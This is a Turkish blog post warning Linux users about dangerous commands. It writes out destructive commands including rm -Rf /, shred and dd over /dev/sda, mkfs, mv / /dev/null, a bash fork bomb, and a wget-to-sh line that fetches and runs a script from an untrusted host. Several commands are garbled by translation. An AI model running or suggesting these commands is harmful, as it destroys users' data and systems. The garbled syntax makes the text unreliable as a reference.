Sıradaki içerik:

Dünyadaki En Önemli Programlama Dilleri Hangileridir?

e
sv

En Tehlikeli Linux Komutları Asla Denemeyin

80 okunma — 20 Ocak 2021 21:31
avatar

admin

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

En Tehlikeli Linux Komutları

En Tehlikeli Linux Komutları, sisteminize geri döndürülemez şekilde zarar verebilecek birçok komut burada. Bazıları diğerlerinden daha az şifreli, bazıları ise anlamsız gibi görünüyor. İşte Linux‘ta bazıları kalıcı ve bazıları kurtarılabilen tehlikeli komutların bir listesi.

En Tehlikeli Linux Komutları

rm -Rf /

Bu komut çok ün kazandı ve özellikle tehlikelidir. Neyse ki, birçok UNIX sistemi kazara veya kasıtsız olarak gerçekleşmemesini sağlamak için rm komutuna bir güvenlik önlemi yerleştirmiştir. Bu kadar yıkıcı bir şeyin yanlışlıkla çalıştırılabileceğini düşünmek kafa karıştırıcı olabilir, ancak bu gerçekten bir BASH komut dosyasında başlatılmamış bir değişkeni kullanmak ve komutu çalıştırmadan önce kontrol etmemek kadar basittir.

parçalama / dev / sda

Shred, bazı veri kurtarma bilgisine sahip herhangi birinin herhangi bir önemli dosya için veri oluşturabileceği rm’nin aksine, özellikle tehlikeli bir komuttur, shred tam da adından da anlaşılacağı gibi yapar. Parçalama, rastgele bilgi üretmek için / dev / random veya / dev / urandom işletim sistemlerinden beslenir. Bu bilgi daha sonra, verileri geri alınamaz hale getirerek birkaç geçişte sürücünün üzerine yazmak için kullanılır. Verilerinizin çoğunu ele geçirmeden işlemi kesmeyi başarsanız bile, bölüm tablonuzu yeniden oluşturmanız ve dokunulmuş olabilecek dosya sistemlerini onarmanız gerekir. Parçalama, dikkatli kullanılmazsa kesinlikle tehlikeli bir komuttur.

dd if = / dev / random = / dev / sda

dd, inanılmaz derecede kullanışlı bir araçtır. Birimlerin, dosya sistemlerinin klonlarını yapmak, görüntüleri disklere yazmak ve hatta sürücüleri silmek için kullanılabilir. Yukarıdaki dd komutu, parçalamanın çok daha hızlı olması ve birden çok geçiş yapması ile parçalama ile hemen hemen aynı olan bir şeyi başarır. varsayılan olarak.

mkfs.ext4 / dev / sda1

Picasso’nun dediği gibi, “her yaratma eylemi önce bir yıkım eylemidir” ve aynısı mkfs için de geçerlidir. Buradaki hata özellikle ext4’te değil, sadece yeni bir dosya sistemi oluşturmak için birimdeki tüm mevcut verileri atmanız gerektiğidir. Açıkçası bu, parlak yeni bir disk için bir sorun değil, ancak sağduyulu bir şekilde kullanılırsa çalışan bir sistemi dizlerinin üzerine çökertebilir.

mv / / dev / null

Bu bizim ilkimiz ile aynı. / Dev / null’a yazılan her şey başarıyla yazılır. Bu, tamamlanması daha uzun sürebilmesine rağmen, bu komutun etkin bir şekilde ilk komutumuzla aynı olduğu anlamına gelir.

Tersine Çevrilebilir Linux Komutlarına Rağmen Tehlikeli Komutlar

: () {: |: &} ;:

 

Bu şifreli dizi, en kötü ve gizemli olan BASH sihirbazlığıdır. BASH Fork Bomb’un ortak adıyla bilinir. Diğer isimleri Tavşan Virüsü veya Wabbit’dir. Yapısı zarif ve ölümcüldür, uygun güvenlik önlemleri alınmazsa herhangi bir sistemi durdurur. Komut, başlangıçta :() ile adında bir işlev oluşturur, daha sonra işlevin içeriğini {: |: &} ile tanımlamaya devam eder, bu yine çok basittir, çünkü yalnızca kendi kendini çalıştırır ve diğerine yönlendirir. süreci arka planı oluştururken kendisini çağırır. Son olarak, fonksiyon tanımı; ve ile aradı:. Bu tür saldırılara karşı savunma yapmak için /etc/security/limits.conf yapılandırma dosyasında önlemleri uygulamanız gerekir.

wget https://unknownsource.com/possarilydangerous.sh -O- | sh

Bu hiç akıllıca olmamalı. Wget kullanışlı bir araç olsa da, indirdiğiniz her şey, özellikle çalıştırılabilir dosyalar, bilinmeyen veya güvenilmeyen bir kaynaktan geliyorsa incelenmelidir. Bu komut, komut dosyasını indirir ve genellikle BASH’a sembolik bir bağlantı olan sh’ye yönlendirir. Bu nedenle, kullanıcının yeterli yetkiye sahip olması koşuluyla, komut dosyasındaki herhangi bir şey yürütülecektir. Komut dosyasının içeriği büyük olasılıkla daha önce bahsedilen komutlardan herhangi biri olabilir.

gunzip güvenilmeyen.gz

Nadiren bilinen Dekompresyon Bombası, yaklaşımında oldukça benzersizdir. Sıkıştırma, bilgilerin daha yüksek oranlarda sıkıştırılması sırasına dayanır, birler veya sıfırlarla dolu bir dosyanın çok yüksek bir orana sıkıştırılabileceği göz önünde bulundurulduğunda, ortaya çıkan dosya orijinal den daha küçük siparişler olabilir. İşte Dekompresyon Bombası tam olarak budur. Açıldığında disk alanını dolduracak bir dosyadır. Bir Linux makinesinde bu, günlüğe kaydetmeyi veya bir dosyaya yazmayı gerektiren birçok sistem hizmeti için ölümcül olabilir. Bu nedenle, güvenilmeyen herhangi bir dosyayı açmak çok tehlikeli olabilir.

command> file.conf

BASH’in yeniden yönlendirme özelliği son derece kullanışlıdır, ancak özen gösterilmeden kullanıldığında, önemli bir yapılandırma dosyasını silebilir. > Ve >> arasında ayrım yapmayı veya değiştirmeyi ve eklemeyi hatırlamak yeni başlayanlar için zor olabilir. Profesyonellerin bunu gözden kaçırması ve dosyaları kaybetmesi bile yaygındır. Bu nedenle, çalıştırdığınız komutları her zaman iki kez, hatta üç kez kontrol etmelisiniz.

^ hata ^ düzeltme

Bu, önceki komutta yapılan bir hatayı düzeltmek için yapılan bir değişikliktir. Araç kutunuzun en üstünde tutmanız gereken bir şey değil, ancak uzun komutları çalıştırırken özellikle kullanışlı bir şey. Buradaki tehlike, kötü amaçlı içeriği önceden çalıştırılan komutlarla değiştire bilmesinden kaynaklanmaktadır, bu nedenle hem önceki komutu hem de değiştirmeyi incelerken dikkatli olmak özellikle önemlidir.

Elbette, bir sistemi bozabilecek veya kalıcı olarak bozabilecek daha birçok komut vardır. Ama bu komutlar çok sıkıntılı komutlar bildiğiniz başka komutlar varsa yorumlarda bize bildirebilirsiniz.

Bir başka makale: Linux Üzerinde Zoom Nasıl Kurulur?

  • Site İçi Yorumlar

En az 10 karakter gerekli